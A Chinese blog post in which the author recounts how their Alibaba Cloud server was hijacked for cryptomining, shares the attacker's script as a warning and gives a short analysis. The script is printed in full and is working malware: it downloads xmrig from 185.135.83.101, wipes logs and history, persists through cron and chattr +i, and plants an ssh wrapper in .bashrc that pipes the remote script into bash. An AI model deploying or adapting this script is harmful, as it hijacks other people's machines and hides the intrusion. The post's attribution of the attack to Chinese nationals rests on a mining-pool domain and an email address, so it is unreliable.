本人阿里云服务器竟然被黑成挖矿肉鸡

今天，我的服务器莫名其妙被黑了，幸好阿里云的短信及时提醒我，不然还一直发现不了：

image.png

赶紧登录上去看看/etc/crontab文件：

image.png

奶奶个腿，哪个不要脸的家伙给我写的这玩意，root权限就这样被拿走了，真郁闷！
http://185.135.83.101/s这是个什么东西，拿下来看看：

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
pkill -f AnXqV.yam
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
PORT_NUMBER=3333
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=5555
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=7777
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=14444
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
}

function cleans() {
echo "" > /var/log/wtmp 
echo "" > /var/log/secure 
history -c
}
U="http://185.135.83.101"
A=`/bin/uname -m`
kills
cleans
[ -f "$HOME/.iscsid ] && exit 0
[ $A != 'x86_64' ] && exit 1

if [ -f "$HOME/.systemd" ]; then
pkill -f .systemd
chattr -i $HOME/.systemd
chattr -i $HOME/.m
mv $HOME/.systemd $HOME/.iscsid
rm -f $HOME/.m
fi

if [ -f "$HOME/.java" ]; then
pkill -f .java
chattr -i $HOME/.java
chattr -i $HOME/.m
mv $HOME/.java $HOME/.iscsid
rm -f $HOME/.java 
rm -f $HOME/.m
fi

if [ -f "$HOME/.netns" ]; then
pkill -f .netns
chattr -i $HOME/.netns
chattr -i $HOME/.m
mv $HOME/.netns $HOME/.iscsid
rm -f $HOME/.netns
rm -f $HOME/.m
fi

if [ -f "$HOME/.perf" ]; then
pkill -f .perf
chattr -i $HOME/.perf
chattr -i $HOME/.m
mv $HOME/.perf $HOME/.iscsid
rm -f $HOME/.perf
rm -f $HOME/.m
fi

cd $HOME
echo -e "\nssh() {\n\t/usr/bin/ssh \$@ -t 'bash -l -c \"wget -qO - http://185.135.83.101/s | bash;bash\"'\n}" >> $HOME/.bashrc
if [ ! -f "$HOME/.iscsid" ]; then
wget -qO .iscsid $U/bin/xmrig &> /dev/null || curl $U/bin/xmrig -o .iscsid
fi
wget -qO .m $U/bin/config.json &> /dev/null || curl $U/bin/config.json -o .m
chmod +x $HOME/.perf
chattr +i $HOME/.iscsid &> /dev/null
chattr +i $HOME/.m &> /dev/null
if [ $UID == 0 ]; then
    echo "vm.nr_hugepages = 128" >> /etc/sysctl.conf
    sysctl -p &> /dev/null
    chattr +i $HOME/.iscsid &> /dev/null
        chattr +i $HOME/.m &> /dev/null
fi
$HOME/.iscsid > /dev/null &
echo -e "$(crontab -l)\n@reboot $HOME/.iscsid" | crontab
[ $0 != 'bash' ] && rm -f $0
kills
cleans
history -c
exit 0

原来是个挖矿脚本，代码写的真丑，我猜作者肯定也丑，丑人多作怪。

这脚本无非就是从185.135.83.101上下载各种程序，而且把这些垃圾还用chattr +i修改了隐藏属性，让我直接用rm无法删除。更不要脸的是，还把标准输出都写到/dev/null。

每次做完坏事后毁尸灭迹，杀掉进程、清空文件做的666，最后还不忘了history -c，我心中一万个曹尼玛，心机有多深，真是做完好事不留名。

查了下IP185.135.83.101，竟然是俄罗斯的服务器，但我不相信这是俄罗斯人干的。脚本的前部分：

ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9

看到[email protected]，看起来像中国人吧。再看域名:stratum.f2pool.com：

image.png

果然是国人干的，MMP！

另外，百度搜一下里面的一个域名xmr.crypto-pool.fr，发现很多人也深受其害，原因很多都是由Redis的“未授权访问缺陷”引起，但本人服务器并没有安装Redis。看来，得找个时间好好研究一下自己的root权限是如何丢失的。

今天，我把这个脚本亮出来，希望大家多注意自己的服务器，不要被这种下三滥给盯上。

欢迎关注本人微信公众号：

爱你之心.jpg

本人阿里云服务器竟然被黑成挖矿肉鸡

你可能感兴趣的:(本人阿里云服务器竟然被黑成挖矿肉鸡)